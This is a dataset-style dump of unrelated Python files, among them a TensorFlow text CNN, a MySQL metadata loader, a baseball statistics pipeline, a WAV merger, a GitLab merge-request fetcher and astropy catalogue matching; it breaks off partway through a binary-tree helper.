text stringlengths 8 6.05M |
|---|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
def debugadapter_port_for_testing() -> int:
    """Return a unique-per-concurrent-process debug adapter port.

    Use this in Pants's (and plugins') own tests to avoid collisions.

    Assumes that the env var TEST_EXECUTION_SLOT has been set. If not, all tests
    will use the same port, and collisions may occur.
    """
    slot = int(os.environ.get("TEST_EXECUTION_SLOT", "0"))
    return 22000 + slot
|
import tensorflow as tf
import numpy as np
import Config
class CNN(object):
    """
    A CNN for text classification.
    Uses an embedding layer, followed by a convolutional, max-pooling and softmax layer.

    NOTE(review): this is TensorFlow 1.x graph-mode code (placeholders,
    tf.contrib); it will not run under TF 2.x without tf.compat.v1 -- confirm
    the target TF version.  The functional change here is converting the
    Python 2 `print` statements to `print()` calls so the module is valid
    Python 3; the graph construction is untouched.
    """
    def __init__(
        self, sequence_length, num_classes, vocab_size,
        embedding_size, filter_sizes, num_filters, l2_reg_lambda=0.0):
        print("making place holders")
        # Placeholders for input, output and dropout
        self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name="input_x")
        self.input_y = tf.placeholder(tf.float32, [None, num_classes], name="input_y")
        self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")

        # Keeping track of l2 regularization loss (optional)
        l2_loss = tf.constant(0.0)

        print("making embd layer")
        # Embedding layer (pinned to CPU).
        with tf.device('/cpu:0'), tf.name_scope("embedding"):
            self.W = tf.Variable(
                tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),
                name="W")
            self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)
            self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)

        # Create a convolution + maxpool layer for each filter size
        print("making conv layer---training starting")
        pooled_outputs = []
        for i, filter_size in enumerate(filter_sizes):
            with tf.name_scope("conv-maxpool-%s" % filter_size):
                # Convolution Layer
                filter_shape = [filter_size, embedding_size, 1, num_filters]
                print("filter shape : ", filter_shape)
                W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name="W")
                print("W shape:")
                b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name="b")
                print("b shape:")
                conv = tf.nn.conv2d(
                    self.embedded_chars_expanded,
                    W,
                    strides=[1, 1, 1, 1],
                    padding="VALID",
                    name="conv")
                # Apply nonlinearity
                h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
                # Maxpooling over the outputs: one max per filter over the
                # whole (sequence_length - filter_size + 1) valid window.
                pooled = tf.nn.max_pool(
                    h,
                    ksize=[1, sequence_length - filter_size + 1, 1, 1],
                    strides=[1, 1, 1, 1],
                    padding='VALID',
                    name="pool")
                pooled_outputs.append(pooled)

        print("combining pool funcs")
        # Combine all the pooled features
        num_filters_total = num_filters * len(filter_sizes)
        print("num filtersssssssss:", num_filters_total)
        self.h_pool = tf.concat(pooled_outputs, 3)
        self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])

        print("making dropout layer")
        # Add dropout
        with tf.name_scope("dropout"):
            self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)

        print("loss calculation")
        # Final (unnormalized) scores and predictions
        with tf.name_scope("output"):
            W = tf.get_variable(
                "W",
                shape=[num_filters_total, num_classes],
                initializer=tf.contrib.layers.xavier_initializer())
            b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name="b")
            l2_loss += tf.nn.l2_loss(W)
            l2_loss += tf.nn.l2_loss(b)
            self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name="scores")
            self.predictions = tf.argmax(self.scores, 1, name="predictions")

        # Calculate mean cross-entropy loss (only output-layer weights are
        # L2-regularized, scaled by l2_reg_lambda).
        with tf.name_scope("loss"):
            losses = tf.nn.softmax_cross_entropy_with_logits(logits=self.scores, labels=self.input_y)
            self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss

        print("calc accuracy")
        # Accuracy
        with tf.name_scope("accuracy"):
            correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
            self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
import pymysql
import time
import os
import db_utils as dbutils
# Shared MySQL connection used by insert_docs() below.
# NOTE(review): credentials are hard-coded in source; they should be read
# from environment variables or a config file before this script is shared.
con = pymysql.connect(
    host='127.0.0.1',
    user='dbuser',
    password='dbuserdbuser',
    db='general-cia-test',
    charset='utf8mb4',
    cursorclass=pymysql.cursors.DictCursor
)
def insert_docs():
    """Walk the metadata directory tree and insert one row per file.

    Each file's lines become the metadata column values (in file order),
    prefixed by the name of the sub-directory the file lives in.  Rows that
    fail to insert (typically duplicates) are logged and skipped.
    """
    tone = time.time()
    rootdir = "/Users/carriehaykellar/Desktop/HistoryLab/meta/"
    for subdir, dirs, files in os.walk(rootdir):
        for file in files:
            vals = []
            with open(os.path.join(subdir, file), encoding='utf8', errors='ignore') as f:
                for lines in f:
                    vals.append(lines)
            # First column is the folder path relative to rootdir.
            dir = subdir.replace(rootdir, "")
            vals.insert(0, dir)
            tvals = tuple(c for c in vals)
            # BUG FIX: the schema name contains a hyphen, so MySQL requires it
            # to be backtick-quoted; unquoted `general-cia-test.metadata` is a
            # syntax error.
            # NOTE(review): building SQL via str(tuple) breaks on values that
            # contain quotes and is injection-prone; switch to parameterized
            # queries if dbutils.run_q supports them.
            sql_insert_meta = "insert into `general-cia-test`.metadata (folder, title, doctype, collection, docID, release_decis, origclass, pages, " \
                              "docrelease, doccreation, sequenceno, caseno, pubdate, contenttype) values " + str(tvals)
            try:
                dbutils.run_q(sql_insert_meta, conn=con)
            except Exception:
                # Most likely a duplicate key; keep going with the next file.
                print("already inserted")
    ttwo = time.time()
    print(ttwo - tone)


insert_docs()
|
import pandas as pd
import numpy as np
from unidecode import unidecode
# <ADD ABBR TEAM NAMES>
# Join each game's long team names to their abbreviations, then rewrite the
# lineup data (minus the href columns) with two new abbreviation columns.
column_names = ['team_name', 'opp_name', 'team_score', 'opp_score', 'team_roster', 'opp_roster', 'team_hrefs', 'opp_hrefs']
df_lineups = pd.read_csv('all-game-lineups.csv', comment='#', names=column_names)
df_team_names = pd.read_csv('team-names.csv', comment='#', names=['long','short'])
team_abbr = []
opp_abbr = []
err_count = 0
for index, row in df_lineups.iterrows():
    # NOTE(review): .index.values[0] raises IndexError when a name has no
    # match at all, so the -1 check below guards a case that cannot occur.
    team_index = df_team_names[df_team_names['long']==row['team_name']].index.values[0]
    opp_index = df_team_names[df_team_names['long']==row['opp_name']].index.values[0]
    if(team_index > -1 and opp_index > -1):
        team_abbr.append(df_team_names.short[team_index])
        opp_abbr.append(df_team_names.short[opp_index])
    else:
        err_count += 1
        print(f"Team name not found. Index: {index}")
print(f"ERROR COUNT: {err_count}")
# Only write the output when every single game resolved to an abbreviation.
if (err_count == 0 and len(team_abbr) == len(df_lineups.team_name) and len(opp_abbr) == len(df_lineups.opp_name)):
    df_lineups.drop(columns=['team_hrefs', 'opp_hrefs'], inplace=True)
    df_lineups['team_abbr'] = team_abbr
    df_lineups['opp_abbr'] = opp_abbr
    df_lineups.to_csv('temp1.csv', index=False, header=False)
# </ADD ABBR TEAM NAMES>
# <ADD PLAYER OFFENSIVE STATS>
# For every game row in temp1.csv, look up each player on the *opponent*
# roster in the season batting table and collect per-player offensive stats
# into list-valued columns.
lineup_col_names = ['team_name', 'opp_name', 'team_score', 'opp_score', 'team_roster', 'opp_roster', 'team_abbr', 'opp_abbr']
df_lineups = pd.read_csv('all-game-lineups-abbr.csv', comment='#', names=lineup_col_names)
# NOTE(review): df_lineups, df_fielding_stats and df_pitching_stats loaded
# here are never referenced in this section; df_temp1 drives the loop.
fielding_col_names = ['Tm','#Fld','RA/G','DefEff','G','GS','CG','Inn','Ch','PO','A','E','DP','Fld%','Rtot','Rtot/yr','Rdrs','Rdrs/yr','Rgood']
df_fielding_stats = pd.read_csv('all-team-fielding.csv', comment='#', names=fielding_col_names)
pitching_col_names = ['Tm','#P','PAge','RA/G','W','L','W-L%','ERA','G','GS','GF','CG','tSho','cSho','SV','IP','H','R','ER','HR','BB','IBB','SO','HBP','BK','WP','BF','ERA+','FIP','WHIP','H9','HR9','BB9','SO9','SO/W','LOB']
df_pitching_stats = pd.read_csv('all-team-pitching.csv', comment='#', names=pitching_col_names)
temp1_col_names = ['team_name','opp_name','team_score','opp_score','team_roster','opp_roster','team_abbr','opp_abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','t_IBB']
df_temp1 = pd.read_csv('temp1.csv', comment='#', names=temp1_col_names)
batting_col_names = ['Rk','Name','Age','Tm','Lg','G','PA','AB','R','H','2B','3B','HR','RBI','SB','CS','BB','SO','BA','OBP','SLG','OPS','OPSplus','TB','GDP','HBP','SH','SF','IBB','Pos Summary']
df_batting_stats = pd.read_csv('all-player-batting.csv', comment='#', names=batting_col_names)
err_count = 0
# One accumulator per stat; each element is the per-player list for a game.
all_player_BA = []
all_player_OBP = []
all_player_SLG = []
all_player_OPS = []
all_player_OPS_plus = []
all_player_GDP = []
all_player_HBP = []
all_player_SH = []
all_player_SF = []
all_player_IBB = []
blank_players = []
for index, row in df_temp1.iterrows():
    # Parse the stringified roster list ("['A B', 'C D', ...]") into names.
    str1 = row['opp_roster'].replace(']','').replace('[','').replace("'",'')
    team_roster = str1.replace('"','').split(",")
    player_BA = []
    player_OBP = []
    player_SLG = []
    player_OPS = []
    player_OPS_plus = []
    player_GDP = []
    player_HBP = []
    player_SH = []
    player_SF = []
    player_IBB = []
    for i in range(len(team_roster)):
        player_stat_index = -1
        # Linear scan of the batting table; names are normalized (accents
        # via unidecode; dashes, dots and apostrophes stripped) before a
        # substring match.
        for stat_index, stat_row in df_batting_stats.iterrows():
            player_name = unidecode(team_roster[i].replace('-',' ').replace('.','').replace("'",''))
            if(player_name[0] == ' '):
                player_name = player_name[1:]
            if(player_name in unidecode(stat_row['Name'].replace('-',' ').replace('.','').replace("'",''))):
                player_stat_index = stat_index
            if(player_stat_index > -1):
                player_BA.append(df_batting_stats.BA[player_stat_index])
                player_OBP.append(df_batting_stats.OBP[player_stat_index])
                player_SLG.append(df_batting_stats.SLG[player_stat_index])
                player_OPS.append(df_batting_stats.OPS[player_stat_index])
                player_OPS_plus.append(df_batting_stats.OPSplus[player_stat_index])
                player_GDP.append(df_batting_stats.GDP[player_stat_index])
                player_HBP.append(df_batting_stats.HBP[player_stat_index])
                player_SH.append(df_batting_stats.SH[player_stat_index])
                player_SF.append(df_batting_stats.SF[player_stat_index])
                player_IBB.append(df_batting_stats.IBB[player_stat_index])
                break
        if(player_stat_index == -1):
            # Unknown player: count the miss and pad every stat with 0 so
            # the per-player lists stay aligned with the roster.
            err_count += 1
            print(f"Player name not found in stats: {player_name}")
            blank_players.append(player_name)
            player_BA.append(0)
            player_OBP.append(0)
            player_SLG.append(0)
            player_OPS.append(0)
            player_OPS_plus.append(0)
            player_GDP.append(0)
            player_HBP.append(0)
            player_SH.append(0)
            player_SF.append(0)
            player_IBB.append(0)
    all_player_BA.append(player_BA)
    all_player_OBP.append(player_OBP)
    all_player_SLG.append(player_SLG)
    all_player_OPS.append(player_OPS)
    all_player_OPS_plus.append(player_OPS_plus)
    all_player_GDP.append(player_GDP)
    all_player_HBP.append(player_HBP)
    all_player_SH.append(player_SH)
    all_player_SF.append(player_SF)
    all_player_IBB.append(player_IBB)
    print(index)
# print(f"all_player_BA: {all_player_BA[:5]}")
print("DONE")
df_temp1['BA'] = all_player_BA
df_temp1['OBP'] = all_player_OBP
# NOTE(review): all_player_SLG is collected above but never written, so
# temp2.csv lacks the SLG column that the next section's temp2_col_names
# expects -- confirm whether df_temp1['SLG'] = all_player_SLG was intended.
df_temp1['OPS'] = all_player_OPS
df_temp1['OPSplus'] = all_player_OPS_plus
df_temp1['GDP'] = all_player_GDP
df_temp1['HBP'] = all_player_HBP
df_temp1['SH'] = all_player_SH
df_temp1['SF'] = all_player_SF
df_temp1['IBB'] = all_player_IBB
df_temp1.to_csv('temp2.csv', index=False, header=False)
# </ADD PLAYER OFFENSIVE STATS>
# <ADD TEAM DEFENSIVE STATS>
# Attach each side's season pitching numbers (runs allowed per game, ERA).
temp2_col_names = ['team_name','opp_name','team_score','opp_score','team_roster','opp_roster','team_abbr','opp_abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','o_BA','o_OBP','o_SLG','o_OPS','o_OPSplus','o_GDP','o_HBP','o_SH','o_SF']
df_temp2 = pd.read_csv('temp2.csv', comment='#', names=temp2_col_names)
# NOTE(review): the fielding table is loaded but never used in this section.
fielding_col_names = ['Tm','#Fld','RA/G','DefEff','G','GS','CG','Inn','Ch','PO','A','E','DP','Fld%','Rtot','Rtot/yr','Rdrs','Rdrs/yr','Rgood']
df_fielding_stats = pd.read_csv('all-team-fielding.csv', comment='#', names=fielding_col_names)
pitching_col_names = ['Tm','#P','PAge','RA/G','W','L','W-L%','ERA','G','GS','GF','CG','tSho','cSho','SV','IP','H','R','ER','HR','BB','IBB','SO','HBP','BK','WP','BF','ERA+','FIP','WHIP','H9','HR9','BB9','SO9','SO/W','LOB']
df_pitching_stats = pd.read_csv('all-team-pitching.csv', comment='#', names=pitching_col_names)
all_team_RA_per_G = []
all_team_ERA = []
all_opp_RA_per_G = []
all_opp_ERA = []
for index, row in df_temp2.iterrows():
    for pitch_index, pitch_row in df_pitching_stats.iterrows():
        if(row['team_abbr'] == pitch_row['Tm']):
            all_team_RA_per_G.append(pitch_row['RA/G'])
            all_team_ERA.append(pitch_row['ERA'])
        elif(row['opp_abbr'] == pitch_row['Tm']):
            all_opp_RA_per_G.append(pitch_row['RA/G'])
            all_opp_ERA.append(pitch_row['ERA'])
    print(index)
# NOTE(review): if an abbreviation ever fails to match a pitching row, the
# four lists fall out of step with the frame and the assignments below
# raise ValueError (length mismatch).
df_temp2['tm_RA/G'] = all_team_RA_per_G
df_temp2['tm_ERA'] = all_team_ERA
df_temp2['opp_RA/G'] = all_opp_RA_per_G
df_temp2['opp_ERA'] = all_opp_ERA
df_temp2.to_csv('temp3.csv', index=False)
# </ADD TEAM DEFENSIVE STATS>
# <SEPARATE TEAMS FROM OPPS>
# Un-pivot each game row into two rows -- one for the team side and one for
# the opponent side -- so every output row describes a single side of a game.
temp3_col_names = ['team_name','opp_name','team_score','opp_score','team_roster','opp_roster','team_abbr','opp_abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','o_BA','o_OBP','o_SLG','o_OPS','o_OPSplus','o_GDP','o_HBP','o_SH','o_SF','tm_RA/G','tm_ERA','opp_RA/G','opp_ERA']
df_temp3 = pd.read_csv('temp3.csv', comment='#', names=temp3_col_names)
temp4_col_names = ['team_name','score','roster','abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','tm_RA/G','tm_ERA']
df_temp4 = pd.DataFrame(columns=temp4_col_names)
# One accumulator per output column; team values and opponent values are
# appended alternately so both sides of a game stay adjacent.
team_names = []
scores = []
rosters = []
abbrs = []
t_BAs = []
t_OBPs = []
t_SLGs = []
t_OPSs = []
t_OPSpluses = []
t_GDPs = []
t_HBPs = []
t_SHs = []
t_SFs = []
tm_RA_per_Gs = []
tm_ERAs = []
for index, row in df_temp3.iterrows():
    # Team side of the game.
    team_names.append(row['team_name'])
    scores.append(row['team_score'])
    rosters.append(row['team_roster'])
    abbrs.append(row['team_abbr'])
    t_BAs.append(row['t_BA'])
    t_OBPs.append(row['t_OBP'])
    t_SLGs.append(row['t_SLG'])
    t_OPSs.append(row['t_OPS'])
    t_OPSpluses.append(row['t_OPSplus'])
    t_GDPs.append(row['t_GDP'])
    t_HBPs.append(row['t_HBP'])
    t_SHs.append(row['t_SH'])
    t_SFs.append(row['t_SF'])
    tm_RA_per_Gs.append(row['tm_RA/G'])
    tm_ERAs.append(row['tm_ERA'])
    # Opponent side of the same game.
    team_names.append(row['opp_name'])
    scores.append(row['opp_score'])
    rosters.append(row['opp_roster'])
    abbrs.append(row['opp_abbr'])
    t_BAs.append(row['o_BA'])
    t_OBPs.append(row['o_OBP'])
    t_SLGs.append(row['o_SLG'])
    t_OPSs.append(row['o_OPS'])
    t_OPSpluses.append(row['o_OPSplus'])
    t_GDPs.append(row['o_GDP'])
    t_HBPs.append(row['o_HBP'])
    t_SHs.append(row['o_SH'])
    t_SFs.append(row['o_SF'])
    tm_RA_per_Gs.append(row['opp_RA/G'])
    tm_ERAs.append(row['opp_ERA'])
df_temp4['team_name'] = team_names
df_temp4['score'] = scores
df_temp4['roster'] = rosters
df_temp4['abbr'] = abbrs
df_temp4['t_BA'] = t_BAs
df_temp4['t_OBP'] = t_OBPs
df_temp4['t_SLG'] = t_SLGs
df_temp4['t_OPS'] = t_OPSs
df_temp4['t_OPSplus'] = t_OPSpluses
df_temp4['t_GDP'] = t_GDPs
df_temp4['t_HBP'] = t_HBPs
df_temp4['t_SH'] = t_SHs
df_temp4['t_SF'] = t_SFs
df_temp4['tm_RA/G'] = tm_RA_per_Gs
df_temp4['tm_ERA'] = tm_ERAs
print(df_temp4.iloc[:5])
df_temp4.to_csv('temp4.csv', index=False)
# <SEPARATE ALL GAMES INTO 2 COLUMNS>
# Flatten every per-side row into one numeric feature vector (x) and a
# target score (y): each stringified stat list is parsed and its elements
# appended in a fixed stat order, followed by the two team-level stats.
temp4_col_names = ['team_name','score','roster','abbr','t_BA','t_OBP','t_SLG','t_OPS','t_OPSplus','t_GDP','t_HBP','t_SH','t_SF','tm_RA/G','tm_ERA']
df_temp4 = pd.read_csv('temp4.csv', comment='#', names=temp4_col_names)
all_x = []
all_y = []
for index, row in df_temp4.iterrows():
    temp_x = []
    str1 = row['t_BA'].replace(']','').replace('[','').replace("'",'')
    t_BA = str1.replace('"','').split(",")
    for i in range(len(t_BA)):
        temp_x.append(t_BA[i])
    str1 = row['t_OBP'].replace(']','').replace('[','').replace("'",'')
    t_OBP = str1.replace('"','').split(",")
    for i in range(len(t_OBP)):
        temp_x.append(t_OBP[i])
    str1 = row['t_SLG'].replace(']','').replace('[','').replace("'",'')
    t_SLG = str1.replace('"','').split(",")
    for i in range(len(t_SLG)):
        temp_x.append(t_SLG[i])
    str1 = row['t_OPS'].replace(']','').replace('[','').replace("'",'')
    t_OPS = str1.replace('"','').split(",")
    for i in range(len(t_OPS)):
        temp_x.append(t_OPS[i])
    str1 = row['t_OPSplus'].replace(']','').replace('[','').replace("'",'')
    t_OPSplus = str1.replace('"','').split(",")
    for i in range(len(t_OPSplus)):
        temp_x.append(t_OPSplus[i])
    str1 = row['t_GDP'].replace(']','').replace('[','').replace("'",'')
    t_GDP = str1.replace('"','').split(",")
    for i in range(len(t_GDP)):
        temp_x.append(t_GDP[i])
    str1 = row['t_HBP'].replace(']','').replace('[','').replace("'",'')
    t_HBP = str1.replace('"','').split(",")
    for i in range(len(t_HBP)):
        temp_x.append(t_HBP[i])
    str1 = row['t_SH'].replace(']','').replace('[','').replace("'",'')
    t_SH = str1.replace('"','').split(",")
    for i in range(len(t_SH)):
        temp_x.append(t_SH[i])
    str1 = row['t_SF'].replace(']','').replace('[','').replace("'",'')
    t_SF = str1.replace('"','').split(",")
    for i in range(len(t_SF)):
        temp_x.append(t_SF[i])
    # Team-level stats go last.
    temp_x.append(row['tm_RA/G'])
    temp_x.append(row['tm_ERA'])
    print(index)
    all_x.append(temp_x)
    all_y.append(row['score'])
df_temp5 = pd.DataFrame(columns=['x','y'])
df_temp5['x'] = all_x
df_temp5['y'] = all_y
df_temp5.to_csv('temp5.csv', index=False)
# <\SEPARATE ALL GAMES INTO 2 COLUMNS>
# <ENSURE ALL DATA IS IN READABLE FORMAT>
# Re-parse the stringified feature lists into plain floats so downstream
# consumers see numeric data instead of strings.
df_temp5 = pd.read_csv('temp5.csv', comment='#', names=['x','y'])
x = []
for raw_features in df_temp5.x:
    cleaned = raw_features.replace(']','').replace('[','').replace("'",'').replace('"','')
    x.append([float(token) for token in cleaned.split(",")])
y = [float(score) for score in df_temp5.y]
# Spot-check the parsed values and their types.
print(x[0])
print(x[0][0])
print(type(x[0][0]))
print(y[0])
print(type(y[0]))
df_temp5.x = x
df_temp5.y = y
# <\ENSURE ALL DATA IS IN READABLE FORMAT>
#!/usr/bin/env python
import re
import wave
import os
from datetime import datetime
class WavFile:
    """
    Provides convenience methods for `wave` operations.
    """
    def __init__(self, location):
        """Ensure the wav filename is parsable and set instance properties.

        Filenames look like ``...N20200101123456.wav``: a channel letter
        (N -> left, F -> right) followed by a 14-digit YYYYMMDDHHMMSS
        timestamp.
        """
        matches = re.match(r'.+?([NF])(\d{14})\.wav$', location)
        if not matches:
            raise Exception('Filename regex failed for %s' % location)
        (ch, timestamp) = matches.groups()
        if ch not in ('N', 'F'):
            raise Exception('Invalid/missing channel')
        self.location = location
        self.channel = 'L' if ch == 'N' else 'R'
        self.timestamp = datetime.strptime(timestamp, '%Y%m%d%H%M%S')

    def open(self):
        """Open for reading with `wave`.  The caller must close the handle."""
        return wave.open(self.location, 'r')

    def length(self):
        """Get length in seconds.

        BUG FIX: the handle opened here was never closed (leaked on every
        call); it is now closed in a finally block.

        NOTE(review): dividing by getnchannels() is only correct for mono
        files (getnframes() already counts whole frames); this script merges
        mono files, so the formula is preserved as-is.
        """
        f = self.open()
        try:
            return (f.getnframes() / f.getframerate()) / f.getnchannels()
        finally:
            f.close()

    def read_all(self):
        """Return all frames.  (Handle-leak fixed, as in length().)"""
        f = self.open()
        try:
            return f.readframes(f.getnframes())
        finally:
            f.close()

    def __str__(self):
        return '%s [%s] [%s]' % (self.location, self.channel, self.timestamp)
class Silence:
    """
    Provides `bytearray` of zeros sized according to `self.length()`
    """
    def __init__(self, length, framerate):
        # Duration in seconds and frame rate in frames per second.
        self._length = length
        self.framerate = framerate

    def length(self):
        """Duration of the silence, in seconds."""
        return self._length

    def read_all(self):
        """Return zeroed frames covering `length()` seconds (2 bytes/frame)."""
        frame_count = int(self.framerate * self.length())
        return bytearray(frame_count * 2)
def wav_iter(files):
    """Iterate over `WavFiles` and provide `Silence` for gaps in audio.

    Yields every file in order; whenever a file ends before the next one
    begins, a `Silence` filler covering the gap is yielded in between.

    BUG FIXES: an empty `files` list no longer raises IndexError; the
    builtin `next` is no longer shadowed; the wave handle opened to read
    the frame rate is now closed.
    """
    if not files:
        return
    yield files[0]
    for cur, nxt in zip(files, files[1:]):
        # Disregard subseconds since timestamp format doesn't allow for it
        delta = (nxt.timestamp - cur.timestamp).seconds
        if cur.length() < delta:
            f = cur.open()
            try:
                framerate = f.getframerate()
            finally:
                f.close()
            yield Silence(delta - cur.length(), framerate)
        yield nxt
def merge(wav_files, output_filename):
    """Merge mono files in sequence into `output_filename`.

    Files are sorted by timestamp; gaps between consecutive files are
    filled with silence (see wav_iter).

    BUG FIXES: the handle opened on the first file to read its params was
    never closed, and the output writer was never closed (so the RIFF
    header could stay unfinalized); both are now closed deterministically.
    """
    # Get output params from first file.
    first = wav_files[0].open()
    try:
        params = first.getparams()
    finally:
        first.close()
    # Build output file; Wave_write supports the context-manager protocol.
    with wave.open(output_filename, 'w') as output:
        output.setparams(params)
        # Sort by timestamp and merge to output in sequence
        wav_files = sorted(wav_files, key=lambda w: w.timestamp)
        for f in wav_iter(wav_files):
            output.writeframes(f.read_all())
    print('Merged to %s' % output_filename)
if __name__ == '__main__':
    audiodir = './audio/'
    left_fn = audiodir + 'left.wav'
    right_fn = audiodir + 'right.wav'
    # Remove any output left over from a previous run.
    for out_path in (left_fn, right_fn):
        if os.path.isfile(out_path):
            os.remove(out_path)
    # Wrap every .wav in the directory, then split by channel.
    wav_files = [WavFile(audiodir + name)
                 for name in os.listdir(audiodir) if name.endswith('.wav')]
    left_files = [w for w in wav_files if w.channel == 'L']
    right_files = [w for w in wav_files if w.channel == 'R']
    # Merge each channel and save.
    merge(left_files, left_fn)
    merge(right_files, right_fn)
|
# Read three integers, multiply them, and print how many times each digit
# 0-9 appears in the product (one count per line, in digit order).
a = int(input())
b = int(input())
c = int(input())
digits = str(a * b * c)
counts = {str(d): 0 for d in range(10)}
for ch in digits:
    counts[ch] += 1
for d in "0123456789":
    print(counts[d])
# Done |
"""
Goal:
* Get empty MRs.
* Empty means
- MR cannot be merged.
- MR has merge conflicts (according to the API result).
"""
import requests
import os
import sys
import logging
# Module logger; basicConfig() attaches a default stderr handler.
logging.basicConfig()
logger = logging.getLogger("EMPTY_MRS")
logger.setLevel(logging.INFO)

# GitLab connection settings, both read from the environment.
PROJECT_ID = os.environ.get("GITLAB_PROJECT_ID", None)
URL = os.environ.get("GITLAB_URL", None)

# REST endpoint fragments, composed into full URLs by the functions below.
# NOTE(review): despite its name, this is the GitLab (not GitHub) API prefix.
GITHUB_API_ENDPOINT = "/api/v4"
ISSUES_ENDPOINT = "/issues"
PROJECT_ENDPOINT = "/projects" + "/{project_id}"
MR_ENDPOINT = "/merge_requests"
MR_VERSION_ENDPOINT = "/{mr_iid}/versions"
TAGS_ENDPOINT = "/repository/tags"
PROJECT_TAGS_ENDPOINT = f"{PROJECT_ENDPOINT}" + f"{TAGS_ENDPOINT}"

# merge_status values returned by the GitLab API.
CAN_BE_MERGED = "can_be_merged"
CANNOT_BE_MERGED = "cannot_be_merged"
def empty_mrs(url=URL, mr=None, headers=None):
    """Return the version history of one merge request.

    Args:
        url: Base GitLab URL (defaults to the GITLAB_URL env setting).
        mr: Merge-request dict as returned by the GitLab API; must carry
            "project_id", "iid" and "web_url" keys.
        headers: HTTP headers (e.g. the private token) for requests.get.

    Returns:
        A list of version dicts (created_at / real_size / state / web_url),
        or an error dict when the API call fails.
    """
    mr_versions = list()
    url = url + GITHUB_API_ENDPOINT
    endpoint = ""
    if mr["project_id"]:
        endpoint = PROJECT_ENDPOINT.format(project_id=mr["project_id"])
    complete_url = (
        url + endpoint + MR_ENDPOINT + MR_VERSION_ENDPOINT.format(mr_iid=mr["iid"])
    )
    response = requests.get(url=complete_url, headers=headers)
    if response.status_code not in [200, 201]:
        # BUG FIX: the "reason" string was missing its f-prefix, so the
        # placeholders were emitted literally.  The sys.exit(1) that
        # followed the return was unreachable and has been removed.
        return {
            "error": "Cannot get merge request.",
            "reason": f"Received status code {response.status_code} with {response.text}.",
            "url": complete_url,
        }
    json_response = response.json()
    logger.debug(json_response)
    for version in json_response:
        created_at = version.get("created_at", None)
        real_size = version.get("real_size", None)
        state = version.get("state", None)
        mr_versions.append(
            {
                "created_at": created_at,
                "real_size": real_size,
                "state": state,
                "web_url": mr["web_url"],
            }
        )
    return mr_versions
|
from utils.utils import *
from utils.visualize import * |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 6 16:38:35 2018
@author: ppxee
"""
### Import Modules Required ###
from astropy.coordinates import match_coordinates_sky
from astropy.coordinates import SkyCoord
from astropy import units as u
from astropy.table import Table
from astropy.io import fits
#import sys
#import numpy as np
# Semester to process; hard-coded here, originally the 1st CLI argument.
sem = '05B'#str(sys.argv[1]) #1st argument from call is the semester
print(sem)

### read in fits_LDAC table and stars table ###
hdul = fits.open('star_stamps_tables/'+sem+'_star_stamps_table.fits', ignore_missing_end=True)
data = hdul[1].data
print('Read stamp table')
stars = Table.read('UDS_catalogues/DR11-secure-stars.fits')
print('Read stars table')

### Define coordinates ###
stampcoord = SkyCoord(data['ALPHA_J2000']*u.degree, data['DELTA_J2000']*u.degree)
starscoord = SkyCoord(stars['RA']*u.degree, stars['DEC']*u.degree)
print('Defined coordinates')

### Match catalogues and create new table ###
#idx, d2d , _ = match_coordinates_sky(starscoord, stampcoord) #match these 'good' stars to create table
# NOTE(review): the sky-match above is disabled and a single hard-coded row
# index is used instead, presumably for testing -- confirm before reuse.
idx = [2998]
starstamps = data[idx]
startb = fits.BinTableHDU.from_columns(starstamps)
startb.writeto('star_stamps_tables/test_'+sem+'_star_stamps_table.fits')
### old code ###
#data = Table.read('SE_stamp_outputs/small_'+sem+'_stamp_output.fits', ignore_missing_end=True)
#print('Read stamp table')
#stars = Table.read('UDS_catalogues/DR11-secure-stars.fits')
#print('Read stars table')
#
#### Define coordinates ###
#stampcoord = SkyCoord(data['ALPHA_J2000'], data['DELTA_J2000'])
#starscoord = SkyCoord(stars['RA']*u.degree, stars['DEC']*u.degree)
#print('Defined coordinates')
#
#### Match catalogues and create new table ###
#idx, d2d , _ = match_coordinates_sky(starscoord, stampcoord) #match these 'good' stars to create table
#starstamps = data[idx]
#
#starstamps.write('star_stamps_tables/small_'+sem+'_star_stamps_table.fits')
#-CATALOG_TYPE FITS_LDAC |
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
"""Lightweight static analysis for many languages. Find bug variants with patterns that look like
source code.
See https://semgrep.dev/ for details.
"""
from __future__ import annotations
from typing import Iterable
from pants.backend.python.goals import lockfile as python_lockfile
from pants.backend.tools.semgrep import rules as semgrep_rules
from pants.backend.tools.semgrep import subsystem as subsystem
from pants.engine.rules import Rule
from pants.engine.unions import UnionRule
def rules() -> Iterable[Rule | UnionRule]:
    """Collect the rules backing the semgrep tool: the semgrep-specific
    rules, its subsystem options, and python lockfile support."""
    collected: list[Rule | UnionRule] = []
    for module in (semgrep_rules, subsystem, python_lockfile):
        collected.extend(module.rules())
    return tuple(collected)
|
class TreeNode:
    """Plain binary-tree node."""
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


def creatTree(nodeList):
    """Build a binary tree from a level-order value list (None = no node).

